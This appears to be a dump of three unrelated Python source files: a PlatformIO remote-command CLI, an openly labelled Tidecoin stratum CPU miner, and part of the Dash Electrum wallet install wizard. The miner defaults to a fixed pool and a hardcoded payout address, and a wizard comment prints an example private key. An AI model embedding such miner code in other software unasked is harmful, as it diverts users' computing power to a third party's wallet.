@remote_agent.command("reload", short_help="Reload agents")
def remote_agent_reload():
    """Delegate `remote agent reload` to the PIO Plus binary."""
    pioplus_call(sys.argv[1:])
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
    """Delegate `remote agent list` to the PIO Plus binary."""
    pioplus_call(sys.argv[1:])
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
    "-c",
    "--only-check",
    is_flag=True,
    help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
    "--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
def remote_update(only_check, dry_run):
    """Delegate `remote update` to the PIO Plus binary (raw argv)."""
    pioplus_call(sys.argv[1:])
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
    "-d",
    "--project-dir",
    default=getcwd,
    type=click.Path(
        exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
def remote_run(**kwargs):
    """Delegate `remote run` to the PIO Plus binary (raw argv)."""
    pioplus_call(sys.argv[1:])
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
    "-d",
    "--project-dir",
    default=getcwd,
    type=click.Path(
        exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
    ),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
def remote_test(**kwargs):
    """Delegate `remote test` to the PIO Plus binary (raw argv)."""
    pioplus_call(sys.argv[1:])
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
    """Subcommand group for remote device operations."""
    pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
def device_list(json_output):
    """Delegate `remote device list` to the PIO Plus binary."""
    pioplus_call(sys.argv[1:])
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option(
    "--baud", "-b", type=int, default=9600, help="Set baud rate, default=9600"
)
@click.option(
    "--parity",
    default="N",
    type=click.Choice(["N", "E", "O", "S", "M"]),
    help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
    "--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
    "--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
    "--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
    "--encoding",
    default="UTF-8",
    help="Set the encoding for the serial port (e.g. hexlify, "
    "Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
    "--eol",
    default="CRLF",
    type=click.Choice(["CR", "LF", "CRLF"]),
    help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
    "--exit-char",
    type=int,
    default=3,
    help="ASCII code of special character that is used to exit "
    "the application, default=3 (Ctrl+C)",
)
@click.option(
    "--menu-char",
    type=int,
    default=20,
    help="ASCII code of special character that is used to "
    "control miniterm (menu), default=20 (DEC)",
)
@click.option(
    "--quiet",
    is_flag=True,
    help="Diagnostics: suppress non-error messages, default=Off",
)
@click.pass_context
def device_monitor(ctx, **kwargs):
    """Bridge the local device monitor to a remote device via PIO Plus.

    PIO Plus writes a local socket path into a temp file; once it appears,
    the regular `device monitor` command is invoked against that socket.
    """
    def _tx_target(sock_dir):
        # Runs PIO Plus in a background thread; a non-zero exit is expected
        # when the monitor is closed, so it is swallowed deliberately.
        try:
            pioplus_call(sys.argv[1:] + ["--sock", sock_dir])
        except exception.ReturnErrorCode:
            pass
    sock_dir = mkdtemp(suffix="pioplus")
    sock_file = join(sock_dir, "sock")
    try:
        t = threading.Thread(target=_tx_target, args=(sock_dir,))
        t.start()
        # Poll until PIO Plus publishes the socket file or dies.
        while t.is_alive() and not isfile(sock_file):
            sleep(0.1)
        if not t.is_alive():
            return
        kwargs["port"] = get_file_contents(sock_file)
        ctx.invoke(cmd_device_monitor, **kwargs)
        t.join(2)
    finally:
        # Always clean up the temp socket directory.
        fs.rmtree(sock_dir)
|
terminate_the_fuck.py | #A stratum compatible miniminer
#based in the documentation
#https://slushpool.com/help/#!/manual/stratum-protocol
#2017-2019 Martin Nadal https://martinnadal.eu
import socket
import json
import random
import traceback
import tdc_mine
import time
from multiprocessing import Process, Queue, cpu_count
# Short alias for the frequently used hex-to-bytes conversion.
bfh = bytes.fromhex
def hash_decode(x: str) -> bytes:
    """Decode a big-endian hex string into little-endian (reversed) bytes."""
    return bytes.fromhex(x)[::-1]
def target_to_bits(target: int) -> int:
    """Encode a 256-bit proof-of-work target in Bitcoin 'compact bits' form."""
    hex_target = ("%066x" % target)[2:]
    # Drop leading zero bytes, keeping at least three bytes of mantissa.
    while hex_target.startswith('00') and len(hex_target) > 6:
        hex_target = hex_target[2:]
    exponent = len(hex_target) // 2
    mantissa = int(hex_target[:6], 16)
    # If the mantissa's top bit is set it would read as negative; shift it
    # down one byte and bump the exponent instead.
    if mantissa >= 0x800000:
        exponent += 1
        mantissa >>= 8
    return (exponent << 24) | mantissa
def bits_to_target(bits: int) -> int:
    """Decode a Bitcoin 'compact bits' value back into the full 256-bit target.

    Raises:
        Exception: if the exponent or mantissa is outside the accepted range.
    """
    bitsN = (bits >> 24) & 0xff
    if not (0x03 <= bitsN <= 0x20):
        # Fixed: the message previously claimed [0x03, 0x1d] while the check
        # actually allows up to 0x20.
        raise Exception("First part of bits should be in [0x03, 0x20]")
    bitsBase = bits & 0xffffff
    if not (0x8000 <= bitsBase <= 0x7fffff):
        raise Exception("Second part of bits should be in [0x8000, 0x7fffff]")
    return bitsBase << (8 * (bitsN - 3))
def bh2u(x: bytes) -> str:
    """
    str with hex representation of a bytes-like object
    >>> x = bytes((1, 2, 10))
    >>> bh2u(x)
    '01020a'
    """
    # Fixed docstring example: bytes.hex() returns lowercase digits, so the
    # previous example value '01020A' was wrong.
    return x.hex()
def miner_thread(xblockheader, difficult):
    """Run one native hashing pass over *xblockheader* from a random nonce.

    Returns whatever tdc_mine reports for the found nonce and hash.
    """
    start_nonce = random.randint(0, 2 ** 32 - 1)  # job.get('nonce')
    return tdc_mine.miner_thread(xblockheader, difficult, start_nonce)
def worker(xblockheader, payload1, payload2, bdiff, sock, number):
    """Mine shares forever and submit each result over *sock*.

    Stops quietly when the socket's pipe breaks (connection lost).
    """
    try:
        while True:
            found = miner_thread(xblockheader, bdiff)
            sock.sendall(payload1 + found[:8] + payload2)
    except BrokenPipeError:
        print("Pipe broken")
def miner(address, host, port, cpu_count=cpu_count(), password='password'):
    """Run a stratum CPU miner against pool *host*:*port*.

    Subscribes and authorizes as *address*, then loops over pool messages:
    'mining.set_difficulty' updates the share difficulty, and every
    'mining.notify' kills the current worker processes and spawns
    *cpu_count* fresh ones for the new job.  On any failure the socket is
    torn down and the function recurses to reconnect after 30 seconds
    (NOTE(review): the recursion grows the stack on every reconnect).
    """
    print("address:{}".format(address))
    print("host:{} port:{}".format(host, port))
    print("Count threads: {}".format(cpu_count))
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((host, port))
        print("Socket connected")
        sock.sendall(b'{"id": 1, "method": "mining.subscribe", "params": ["pytideminer-1.0.0"]}\n')
        lines = sock.recv(1024).decode().split('\n')
        response = json.loads(lines[0])
        sub_details, extranonce1, extranonce2_size = response['result']
        extranonce2 = '00' * extranonce2_size
        sock.sendall(b'{"params": ["' + address.encode() + b'", "' + password.encode() + b'"], "id": 2, "method": "mining.authorize"}\n')
        print("Mining authorize")
        procs = []
        count = cpu_count
        print("Start mining")
        new_time = time.time()
        count_shares = 0
        global_count_share = 0
        global_count_success_share = 0
        difficult = 0.5
        # Initialize values otherwise only set by 'mining.set_difficulty',
        # so a 'mining.notify' or accepted share arriving first cannot hit
        # an unbound name (old_diff / bdiff were previously undefined here).
        old_diff = difficult
        bdiff = bytes(str(difficult), "UTF-8")
        timer_without_new_job = time.time()
        while True:
            response = sock.recv(2024).decode()
            # A single recv may carry several newline-separated JSON messages.
            responses = [json.loads(res) for res in response.split('\n') if len(res.strip()) > 0]
            for response in responses:
                if response['id'] == 4 and not response['error']:
                    # id 4 is our 'mining.submit' request: share accepted.
                    count_shares += 1
                    global_count_share += 1
                    global_count_success_share += 1
                    print(f"accepted: {global_count_success_share}/{global_count_share} ({round(global_count_success_share/global_count_share*100)}%) (yay!!!)")
                elif response['id'] == 4 and response['error']:
                    global_count_share += 1
                    print("boooo", response['error'])
                elif response['id'] == 2 and not response['error']:
                    print("Authorize successful!!!")
                elif response['id'] == 2 and response['error']:
                    print("Authorize error!!!", response['error'])
                # get rid of empty lines
                elif response['method'] == 'mining.set_difficulty':
                    old_diff = difficult
                    difficult = response['params'][0]
                    bdiff = bytes(str(difficult), "UTF-8")
                    print("New stratum difficulty: ", difficult)
                elif response['method'] == 'mining.notify':
                    job_id, prevhash, coinb1, coinb2, merkle_branch, \
                        version, nbits, ntime, clean_jobs = response['params']
                    d = ''
                    for h in merkle_branch:
                        d += h
                    merkleroot_1 = tdc_mine.sha256d_str(coinb1.encode('utf8'), extranonce1.encode('utf8'),
                                                        extranonce2.encode('utf8'), coinb2.encode('utf8'), d.encode('utf8'))
                    xblockheader0 = version + prevhash + merkleroot_1.decode('utf8') + ntime + nbits
                    print("Mining notify")
                    # New job: stop any workers still mining the stale one.
                    for proc in procs:
                        proc.terminate()
                    procs = []
                    timer_without_new_job = time.time()
                    old_time = new_time
                    new_time = time.time()
                    xnonce = "00000000"
                    xblockheader = (xblockheader0 + xnonce).encode('utf8')
                    # NOTE(review): the submit payload sends the literal string
                    # "address" as the worker name rather than the *address*
                    # argument -- verify whether the pool keys shares on the
                    # authorized connection or on this field.
                    payload1 = bytes(
                        '{"params": ["' + "address" + '", "' + job_id + '", "' + extranonce2 + '", "' + ntime + '", "',
                        "UTF-8")
                    payload2 = bytes('"], "id": 4, "method": "mining.submit"}\n', "UTF-8")
                    for number in range(count):
                        proc = Process(target=worker, args=(xblockheader, payload1, payload2, bdiff, sock, number + 1))
                        proc.daemon = True
                        procs.append(proc)
                        proc.start()
                    if count_shares:
                        hashrate = count_shares * (old_diff / 65536) * 2 ** 32 / (new_time-old_time)
                        print(f"Found {count_shares} shares in {round(new_time-old_time)} seconds at diff", old_diff)
                        print(f"Current Hashrate:", round(hashrate), "H/s")
                        print(f"Recommended diff:", round((count_shares*10/(new_time-old_time))*old_diff, 2))
                        old_diff = difficult
                        count_shares = 0
            # Force a reconnect when the pool has sent no job for two
            # minutes.  The original comparison was inverted
            # (timer - now > 120) and could never fire; the bare `raise`
            # that followed only worked by accidentally raising RuntimeError.
            if time.time() - timer_without_new_job > 120:
                raise RuntimeError("no new job received for 120 seconds")
    except KeyboardInterrupt:
        for proc in procs:
            proc.terminate()
        sock.close()
    except Exception:
        print(traceback.format_exc())
        try:
            for proc in procs:
                proc.terminate()
        except Exception:
            pass
        try:
            sock.close()
        except Exception:
            pass
        print("Connection refused, restart after 30 s")
        time.sleep(30)
        miner(address, host, port, cpu_count, password)
if __name__ == "__main__":
    import argparse
    import sys
    # Parse the command line
    parser = argparse.ArgumentParser(description="PyMiner is a Stratum CPU mining client. "
                                                 "If you like this piece of software, please "
                                                 "consider supporting its future development via "
                                                 "donating to one of the addresses indicated in the "
                                                 "README.md file")
    parser.add_argument('-o', '--url', default="pool.tidecoin.exchange:3032", help='mining server url (eg: pool.tidecoin.exchange:3032)')
    parser.add_argument('-u', '--user', dest='username', default='TSrAZcfyx8EZdzaLjV5ketPwtowgw3WUYw.default', help='username for mining server',
                        metavar="USERNAME")
    # Fixed copy-pasted metavars: these two options are not usernames.
    parser.add_argument('-t', '--threads', dest='threads', default=cpu_count(), help='count threads',
                        metavar="THREADS")
    parser.add_argument('-p', '--password', dest='password', default='password', help='password',
                        metavar="PASSWORD")
    options = parser.parse_args(sys.argv[1:])
    miner(options.username, options.url.split(":")[0], int(options.url.split(":")[1]), int(options.threads), options.password)
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum_dash.wallet import Wallet, Abstract_Wallet
from electrum_dash.storage import WalletStorage
from electrum_dash.util import UserCancelled, InvalidPassword, WalletFileException
from electrum_dash.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_dash.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum_dash.plugin import run_hook
# Prompt shown when asking the user to choose a new wallet password.
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")
# Explains hardware-wallet file encryption (the file holds no secrets).
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
                            + _("Your wallet file does not contain secrets, mostly just metadata. ") \
                            + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
                            + _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
# Help text displayed next to WIF private-key entry fields.
WIF_HELP_TEXT = (_('WIF keys are typed in Dash Electrum, based on script type.') + '\n\n' +
                 _('A few examples') + ':\n' +
                 'p2pkh:XERBBcaPf5D5... \t-> XhGqfhnL...\n')
# note: full key is XERBBcaPf5D5oFXTEP7TdPWLem5ktc2Zr3AhhQhHVQaF49fDP6tN
# Warning about irregular whitespace in seed passphrases (upstream issue #4566).
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
                                + _("You have multiple consecutive whitespaces or leading/trailing "
                                    "whitespaces in your passphrase.") + " " \
                                + _("This is discouraged.") + " " \
                                + _("Due to a bug, old versions of Dash Electrum will NOT be creating the "
                                    "same wallet as newer versions or other software.")
class CosignWidget(QWidget):
    """Pie-chart widget visualising an m-of-n multisig configuration."""
    size = 120  # widget edge length in pixels
    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(4, 4, self.size-8, self.size-8)  # drawing rect, 4px margin
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m  # required signatures (green slices)
        self.n = n  # total cosigners (total slices)
    def set_n(self, n):
        """Update the number of cosigners and repaint."""
        self.n = n
        self.update()
    def set_m(self, m):
        """Update the number of required signatures and repaint."""
        self.m = m
        self.update()
    def paintEvent(self, event):
        """Draw n pie slices; the first m are green, the rest gray."""
        bgcolor = self.palette().color(QPalette.Background)
        pen = QPen(bgcolor, 8, Qt.SolidLine)
        qp = QPainter()
        qp.begin(self)
        qp.setPen(pen)
        qp.setRenderHint(QPainter.Antialiasing)
        qp.setBrush(Qt.gray)
        for i in range(self.n):
            # Qt pie angles are expressed in 1/16ths of a degree.
            alpha = int(16* 360 * i/self.n)
            alpha2 = int(16* 360 * 1/self.n)
            qp.setBrush(Qt.green if i<self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
        qp.end()
def wizard_dialog(func):
    """Decorate a wizard step: forward its result to ``run_next`` and turn
    GoBack exceptions into back-navigation (or dialog close at the start)."""
    def func_wrapper(*args, **kwargs):
        wizard = args[0]  # type: InstallWizard
        advance = kwargs['run_next']
        label = _('Back') if wizard.can_go_back() else _('Cancel')
        wizard.back_button.setText(label)
        try:
            result = func(*args, **kwargs)
            # Non-tuple results are wrapped so they can be splatted below.
            # (Deliberately `type(...) is not tuple`: NamedTuple results must
            # still be wrapped as a single argument.)
            if type(result) is not tuple:
                result = (result,)
            advance(*result)
        except GoBack:
            if not wizard.can_go_back():
                # At the first step there is nothing to go back to.
                wizard.close()
                raise
            wizard.go_back()
            return
    return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
    """Raised when the selected wallet file is already open in the daemon."""
    def __init__(self, wallet: Abstract_Wallet):
        super().__init__()
        self.wallet = wallet  # the already-open wallet instance
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
    """Qt implementation of the wallet install/restore wizard.

    Drives BaseWizard steps through a single dialog whose main widget is
    swapped per step.  Navigation blocks on a local QEventLoop; its exit
    codes are 0 = cancel/rejected, 1 = back, 2 = next.
    """
    accept_signal = pyqtSignal()  # emitted by terminate() to close the dialog
    def __init__(self, config, app, plugins):
        QDialog.__init__(self, None)
        BaseWizard.__init__(self, config, plugins)
        self.setWindowTitle('Dash Electrum - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        self.loop = QEventLoop()
        # Map dialog events onto the event-loop exit codes used by exec_layout().
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon('electrum-dash.png')
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX. Lame.
    def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
        """Let the user pick (or create) a wallet file and unlock it.

        Returns (path, storage); storage is None when the file does not
        exist yet.  Raises UserCancelled on cancel and
        WalletAlreadyOpenInMemory when the daemon already holds the wallet.
        """
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        self.name_e = QLineEdit()
        hbox.addWidget(self.name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)
        self.msg_label = QLabel('')
        vbox.addWidget(self.msg_label)
        hbox2 = QHBoxLayout()
        self.pw_e = QLineEdit('', self)
        self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
        self.pw_e.setEchoMode(2)  # QLineEdit.Password
        self.pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(self.pw_label)
        hbox2.addWidget(self.pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        self.set_layout(vbox, title=_('Dash Electrum wallet'))
        self.temp_storage = WalletStorage(path, manual_upgrades=True)
        wallet_folder = os.path.dirname(self.temp_storage.path)
        def on_choose():
            # File-picker alternative to typing a name.
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                self.name_e.setText(path)
        def on_filename(filename):
            # Re-evaluate the chosen file on every edit and update the UI.
            path = os.path.join(wallet_folder, filename)
            wallet_from_memory = get_wallet_from_daemon(path)
            try:
                if wallet_from_memory:
                    self.temp_storage = wallet_from_memory.storage
                else:
                    self.temp_storage = WalletStorage(path, manual_upgrades=True)
                self.next_button.setEnabled(True)
            except BaseException:
                self.logger.exception('')
                self.temp_storage = None
                self.next_button.setEnabled(False)
            user_needs_to_enter_password = False
            if self.temp_storage:
                if not self.temp_storage.file_exists():
                    msg =_("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
                elif not wallet_from_memory:
                    if self.temp_storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        user_needs_to_enter_password = True
                    elif self.temp_storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                else:
                    msg = _("This file is already open in memory.") + "\n" \
                        + _("Press 'Next' to create/focus window.")
            else:
                msg = _('Cannot read file')
            self.msg_label.setText(msg)
            # Only show the password field when it is actually needed.
            if user_needs_to_enter_password:
                self.pw_label.show()
                self.pw_e.show()
                self.pw_e.setFocus()
            else:
                self.pw_label.hide()
                self.pw_e.hide()
        button.clicked.connect(on_choose)
        self.name_e.textChanged.connect(on_filename)
        n = os.path.basename(self.temp_storage.path)
        self.name_e.setText(n)
        while True:
            if self.loop.exec_() != 2:  # 2 = next
                raise UserCancelled
            if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
                break
            if not self.temp_storage.file_exists():
                break
            wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
            if wallet_from_memory:
                raise WalletAlreadyOpenInMemory(wallet_from_memory)
            if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
                if self.temp_storage.is_encrypted_with_user_pw():
                    password = self.pw_e.text()
                    try:
                        self.temp_storage.decrypt(password)
                        break
                    except InvalidPassword as e:
                        # Wrong password: let the user retry.
                        self.show_message(title=_('Error'), msg=str(e))
                        continue
                    except BaseException as e:
                        self.logger.exception('')
                        self.show_message(title=_('Error'), msg=str(e))
                        raise UserCancelled()
                elif self.temp_storage.is_encrypted_with_hw_device():
                    try:
                        self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
                    except InvalidPassword as e:
                        self.show_message(title=_('Error'),
                                          msg=_('Failed to decrypt using this hardware device.') + '\n' +
                                              _('If you use a passphrase, make sure it is correct.'))
                        self.reset_stack()
                        # Restart the whole selection after a failed decrypt.
                        return self.select_storage(path, get_wallet_from_daemon)
                    except BaseException as e:
                        self.logger.exception('')
                        self.show_message(title=_('Error'), msg=str(e))
                        raise UserCancelled()
                    if self.temp_storage.is_past_initial_decryption():
                        break
                    else:
                        raise UserCancelled()
                else:
                    raise Exception('Unexpected encryption version')
        return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)  #
    def run_upgrades(self, storage):
        """Split, complete or upgrade *storage* as required before opening it."""
        path = storage.path
        if storage.requires_split():
            self.hide()
            msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Dash Electrum 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?").format(path)
            if not self.question(msg):
                return
            file_list = '\n'.join(storage.split_accounts())
            msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            # raise now, to avoid having the old storage opened
            raise UserCancelled()
        action = storage.get_action()
        if action and storage.requires_upgrade():
            raise WalletFileException('Incomplete wallet files cannot be upgraded.')
        if action:
            self.hide()
            msg = _("The file '{}' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?").format(path)
            if not self.question(msg):
                if self.question(_("Do you want to delete '{}'?").format(path)):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
            self.data = storage.db.data # FIXME
            self.run(action)
            for k, v in self.data.items():
                storage.put(k, v)
            storage.write()
            return
        if storage.requires_upgrade():
            self.upgrade_storage(storage)
    def finished(self):
        """Called in hardware client wrapper, in order to close popups."""
        return
    def on_error(self, exc_info):
        """Log *exc_info* and show it to the user, unless it is a cancel."""
        if not isinstance(exc_info[1], UserCancelled):
            self.logger.error("on_error", exc_info=exc_info)
            self.show_error(str(exc_info[1]))
    def set_icon(self, filename):
        """Swap the wizard logo; return the previously set icon filename."""
        prior_filename, self.icon_filename = self.icon_filename, filename
        self.logo.setPixmap(QPixmap(icon_path(filename))
                            .scaledToWidth(60, mode=Qt.SmoothTransformation))
        return prior_filename
    def set_layout(self, layout, title=None, next_enabled=True):
        """Install *layout* as the content of the current wizard step."""
        self.title.setText("<b>%s</b>"%title if title else "")
        self.title.setVisible(bool(title))
        # Get rid of any prior layout by assigning it to a temporary widget
        prior_layout = self.main_widget.layout()
        if prior_layout:
            QWidget().setLayout(prior_layout)
        self.main_widget.setLayout(layout)
        self.back_button.setEnabled(True)
        self.next_button.setEnabled(next_enabled)
        if next_enabled:
            self.next_button.setFocus()
        self.main_widget.setVisible(True)
        self.please_wait.setVisible(False)
    def exec_layout(self, layout, title=None, raise_on_cancel=True,
                        next_enabled=True):
        """Show *layout* and block in the local event loop until the user
        presses Back (raises GoBack), Next, or cancels (raises UserCancelled
        when *raise_on_cancel*).  Returns the loop's exit code."""
        self.set_layout(layout, title, next_enabled)
        result = self.loop.exec_()
        if not result and raise_on_cancel:
            raise UserCancelled
        if result == 1:
            raise GoBack from None
        # Switch to the "please wait" state until the next step installs
        # its own layout.
        self.title.setVisible(False)
        self.back_button.setEnabled(False)
        self.next_button.setEnabled(False)
        self.main_widget.setVisible(False)
        self.please_wait.setVisible(True)
        self.refresh_gui()
        return result
    def refresh_gui(self):
        """Force Qt to process pending events so the dialog repaints."""
        # For some reason, to refresh the GUI this needs to be called twice
        self.app.processEvents()
        self.app.processEvents()
    def remove_from_recently_open(self, filename):
        """Drop *filename* from the recently-opened-wallets config list."""
        self.config.remove_from_recently_open(filename)
    def text_input(self, title, message, is_valid, allow_multi=False):
        """Show a validated free-text entry step and return the entered text."""
        slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
                             allow_multi=allow_multi)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_text()
    def seed_input(self, title, message, is_seed, options):
        """Show a seed entry step; return (seed, is_bip39, is_ext)."""
        slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
    @wizard_dialog
    def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
        """Ask for a master public key (optionally with WIF help text)."""
        header_layout = QHBoxLayout()
        label = WWLabel(message)
        label.setMinimumWidth(400)
        header_layout.addWidget(label)
        if show_wif_help:
            header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        return self.text_input(title, header_layout, is_valid, allow_multi)
    @wizard_dialog
    def add_cosigner_dialog(self, run_next, index, is_valid):
        """Ask for cosigner number *index*'s xpub (or xprv)."""
        title = _("Add Cosigner") + " %d"%index
        message = ' '.join([
            _('Please enter the master public key (xpub) of your cosigner.'),
            _('Enter their master private key (xprv) if you want to be able to sign for them.')
        ])
        return self.text_input(title, message, is_valid)
    @wizard_dialog
    def restore_seed_dialog(self, run_next, test):
        """Ask for an existing seed phrase to restore a wallet."""
        options = []
        if self.opt_ext:
            options.append('ext')
        if self.opt_bip39:
            options.append('bip39')
        title = _('Enter Seed')
        message = _('Please enter your seed phrase in order to restore your wallet.')
        return self.seed_input(title, message, test, options)
    @wizard_dialog
    def confirm_seed_dialog(self, run_next, test):
        """Make the user retype the freshly generated seed to confirm it."""
        self.app.clipboard().clear()
        title = _('Confirm Seed')
        message = ' '.join([
            _('Your seed is important!'),
            _('If you lose your seed, your money will be permanently lost.'),
            _('To make sure that you have properly saved your seed, please retype it here.')
        ])
        seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
        return seed
    @wizard_dialog
    def show_seed_dialog(self, run_next, seed_text):
        """Display the newly generated seed; return whether 'ext' was chosen."""
        title =  _("Your wallet generation seed is:")
        slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
        self.exec_layout(slayout)
        return slayout.is_ext
    def pw_layout(self, msg, kind, force_disable_encrypt_cb):
        """Show a password layout; return (new_password, encrypt_file)."""
        playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
                                 force_disable_encrypt_cb=force_disable_encrypt_cb)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.new_password(), playout.encrypt_cb.isChecked()
    @wizard_dialog
    def request_password(self, run_next, force_disable_encrypt_cb=False):
        """Request the user enter a new password and confirm it. Return
        the password or None for no password."""
        return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
    @wizard_dialog
    def request_storage_encryption(self, run_next):
        """Ask whether a hardware wallet's file should be encrypted."""
